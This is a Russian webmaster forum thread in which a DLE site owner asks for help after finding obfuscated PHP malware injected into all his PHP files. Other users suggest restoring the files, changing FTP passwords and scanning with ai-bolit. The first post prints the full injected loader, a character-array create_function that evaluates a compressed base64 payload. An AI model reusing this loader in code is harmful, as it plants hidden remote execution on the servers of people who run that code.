X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вредоносный код в Php файлах [dle]
casp
casp
Topic Starter сообщение 5.10.2012, 13:55; Ответить: casp
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 717
Регистрация: 7.11.2009
Из: 127.0.0.1
Поблагодарили: 158 раз
Репутация:   36  


Приветствую!

Сегодня захожу на свой сайт, и обнаруживаю такую проблему, ругается касперский, типа вирус содержится и т.д и т.п
Я сразу же рыть файлы, и нашел вот что. В каждом php файле прописана такая дрянь:

<?php
$md5 = "61836c1a8a0763b37a88d9df07e4e";
$a8 = array("g",')','$',"e",'6',&quo

t;z","a","c","(","4","d",

'b','i','n','l','f',"r&qu

ot;,'v',"_",'s','t',"o",'

;');
$b88 = create_function('$'.'v',$a8[3].$a8[17].$a8[6].$a8[14].$a8[8]

.$a8[0].$a8[5].$a8[12].$a8[13].$a8[15].$a8[14].$a8[6].$a8[20].$a8[3].$a8[8].$a8[

11].$a8[6].$a8[19].$a8[3].$a8[4].$a8[9].$a8[18].$a8[10].$a8[3].$a8[7].$a8[21].$a

8[10].$a8[3].$a8[8].$a8[2].$a8[17].$a8[1].$a8[1].$a8[1].$a8[22]);
$b88('DZRHroRYAgSPM91igXeaFd5TeLcZ4aHwUMCD08/PRRwgM5T1lY//tG8/N2P+q/8p8qOmi

P9VdblU9T//EStPlvYg5gaxI3135fcuMlqnVL0tuwzTA2fcbzgMqzv5bl+rgSe6xlHX+eRfCD4z2vNU2

KB+vbmdMAx0UwSh432kfPA/9c1XdX6PSp0/VWG9faGDW1mL11ESKgqwjiDf50xiU65IQAN/U+D8fZpkF

0L4ZuGSTmADS/oG+2QITmne1Trha4pPkRthuxpyrxSxyy9fxyzkzqdwmNmayS9zEjqnzkoyaObkCJKow

Au7WmY8RZrBhYvaPc5ypGdbfFy3Fr1JjBXPrp4JzQjmVhnMt7AiFTvBUJexydjtD1jK4FhTpYJKvlXfg

YSJlY54l9DQ1YkJhIUuDVmEJ8JUBoN0ur6PmleY52glj7neZqbipzRVnRaPAmaRYn1b1yzC2CWFQ9xeA

btLhcnvah6kdJLJ2StRLD72ksaj2+acLo5q9td3jB4pt4uCQo0FvFd/frT1ypuOk8QVZwm1ggCX7xFfx

njKAITig6fmKg7l3V0vLGtILmBG9GZakJzLKbThTdfkFHikPDfMN3Wr8YlXIoUUyubPkgjzPYphYtDPV

4fPxTCQdOqNR7B/h4SI38cF6rUg0d/O87QV7WVWsYmOum+Zovayh9X6tPCojQSrPMH71Z8tp2dzH3mnR

Pq9Hc/n6qZqHIh0diTwsOPhdcSBXoylw82pxuKvhixxO2x4BQXuUIpCPR87kBfNGuo1dpTQqquNU5Wg7

qUFH7iMZZasHM4vhD3z4zua0D/IgWVuC6qi+Vo++rDS1xyfv8EEweuqkjx5s6HKuJiJWKcZ9v17aVtPR

/cH7u0Nv0CZ9+nnnpUjaWHi19bFSrwnQ55Rp6DomGxr/ATNaWUeJt6Kdq3GdaSpNCMys0vvFmSzu3ZsQ

v77wY1fiSs2fZcD/rP71DLLgEtUYgqt6DRmOb2WpBZt11XJLqm9yejC5guF7lRTA/BBJoOeJjKfkiUL3

zOE/qjMNPsTX1Ed4cizwzFvifqlv8
jktjBOTG0Fz2DxFQhzcRqiNaa57jKyfPkF9bGW+LoggHcm4HQg3x2rmjKTWfJXASGkSnaLXop3yHiv/R

MInaPUr1kb9RlpWlMoVO/zUYmSKQ2QIqJWpiFUYFpRILcTB5eunvFpDwWGBke4t4pxf3pPsuRWORhRYB

c9CKd/0G28jyapS/OdY8MCGjIwgkGaEW/q/Vw1HMO1ynhcLyd7VFzLxaFwP3GDP9ThvwoK432VCb95Zz

Hj7SGsK/VWKFupZ3PW4VbFZofoSE7EAmP1jtwGYqE0XvRUzCmT60AB0rGOb9kP+pkN8qsQ9/8aO2O/6+

NwzLEzcWOmNIEYf3SN2oncBkkNCObBxt2uG3AXM17HjvKidsiXx5vOzPgercCsMlmmhC6KpMiauHl9YL

9HqFaujrWTflwY7tGtYGfPhv1Hd/o5Tc/HWNMx9eEVIwpjzeT4n+yU7tvRw2ljKAH4C7/Tv2eeyfDHCE

jWSBL1qS3As8noF5qZPXLniGkxgTNhwfC3PVqC4q9grLe6iNLQldRXqZb1gxz7WZmb6OH47QXPccvg5q

sK8jOpGo5ixyyQop5ZB+OlDDUQVNebBnolxBpafd0+3v1glpFameo133oLN84fIutMgAplIM37Ru/f6C

w1DUF03Dcw4//n333//+38=');
?>
<?php


Как это убрать всё массово? Откуда эта дрянь пошла, точнее с какого файла. Вычислить бы и удалить(

Сообщение отредактировал casp - 5.10.2012, 13:56
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
psk89
psk89
сообщение 5.10.2012, 13:58; Ответить: psk89
Сообщение #2


ООООО... я сменил аватар
******


Группа: Active User
Сообщений: 1465
Регистрация: 16.9.2011
Из: Питер
Поблагодарили: 868 раз
Репутация:   116  


Какая cms у сайта?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OlegK
OlegK
сообщение 5.10.2012, 13:59; Ответить: OlegK
Сообщение #3


Топовый постер
*******


Группа: Ex-Moderator
Сообщений: 4043
Регистрация: 24.4.2011
Поблагодарили: 7227 раз
Репутация:   313  


psk89, вы заголовок топика читали ?

Сообщение отредактировал OlegK - 5.10.2012, 14:00


--------------------
ooooops.
something goes wrong
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
psk89
psk89
сообщение 5.10.2012, 14:06; Ответить: psk89
Сообщение #4


ООООО... я сменил аватар
******


Группа: Active User
Сообщений: 1465
Регистрация: 16.9.2011
Из: Питер
Поблагодарили: 868 раз
Репутация:   116  


(OlegK @ 5.10.2012, 12:59) *
psk89, вы заголовок топика читали ?

Извиняюсь за свою невнимательность.
Смотри файлы .tpl - он там спрятан - в каком именно сказать конечно не могу. Найди там подозрительный (ненужный) код и удаляй. Или если есть на хостинге проверка антивирусом - то она выдаст тебе название файла где есть вредоносный код.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Рэшад
Рэшад
сообщение 5.10.2012, 14:11; Ответить: Рэшад
Сообщение #5


Завсегдатай
*****

Группа: Active User
Сообщений: 734
Регистрация: 28.9.2009
Из: Бендеры
Поблагодарили: 255 раз
Репутация:   51  


вроде если во всех файлах такая штука выкачивают сайт и делают через нотепад++ замену на все файлы, но в любом случае вам стоит подумать о безопасности сайта и закрыть дырки, обновить кмс


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Infacto
Infacto
сообщение 5.10.2012, 14:13; Ответить: Infacto
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 937
Регистрация: 19.9.2011
Из: www
Поблагодарили: 369 раз
Репутация:   79  


Если осталась на компьютере оригинальные файлы - замените.
Так же смените пароли на ФТП, поковыряйтесь в правах доступа к файлам.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
casp
casp
Topic Starter сообщение 5.10.2012, 17:16; Ответить: casp
Сообщение #7


Завсегдатай
*****

Группа: Active User
Сообщений: 717
Регистрация: 7.11.2009
Из: 127.0.0.1
Поблагодарили: 158 раз
Репутация:   36  


Спасибо.
Найти бы эту заразу .php которая разносит по всем. А то думаю опять заразяться файлы потом((

А никак нельзя найти этот шел на сервере?(
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 5.10.2012, 20:13; Ответить: Rxp
Сообщение #8


Участник
***


Группа: User
Сообщений: 115
Регистрация: 9.11.2008
Поблагодарили: 21 раз
Репутация:   10  


ТС стчите проведем полный осомтр и удалени всего вредоносного, втом числе шеллы, загрусчики и т..д. + дадим рекомендации!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
silvan
silvan
сообщение 6.10.2012, 14:02; Ответить: silvan
Сообщение #9


Завсегдатай
*****

Группа: Active User
Сообщений: 591
Регистрация: 3.2.2010
Из: Москва
Поблагодарили: 127 раз
Репутация:   40  


руками это тереть конечно жестко..


--------------------
Эх, где же maultalk образца 2010 года... Где та атмосфера?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FRUTALITY
FRUTALITY
сообщение 6.10.2012, 14:37; Ответить: FRUTALITY
Сообщение #10


Участник
***

Группа: User
Сообщений: 144
Регистрация: 7.9.2010
Поблагодарили: 39 раз
Репутация:   3  


(casp @ 5.10.2012, 22:16) *
А никак нельзя найти этот шел на сервере?(

Попробуйте бесплатный скрипт ai-bolit, мне недавно помог найти шелл.
Массово удалить из всех файлов можно php-скриптом, если владеете программированием, но надежнее просто перезалить исходники.


--------------------
Magic 8 ball как в фильме "Трасса 60". Онлайн.
Мой скромный бложе.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102788 14.12.2017, 10:55
автор: kukla
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1162 13.12.2017, 23:36
автор: Nell
Открытая тема (нет новых ответов) Недорогие услуги - php/js/mysql/jquery/bootstrap
2 vlads 655 13.12.2017, 21:01
автор: vlads
Открытая тема (нет новых ответов) Веб-разработка (HTML5, CSS3, JavaScript, jQuery, Ajax, PHP)
18 qpPeW 3443 12.12.2017, 13:32
автор: qpPeW
Открытая тема (нет новых ответов) php скрипты любой сложности / диз+верстка (адаптивно)
любые задачи на php - автоматизация, парсинг, работа с БД
1 affrodita 507 8.12.2017, 17:40
автор: affrodita


 



RSS Текстовая версия Сейчас: 16.12.2017, 11:38
Дизайн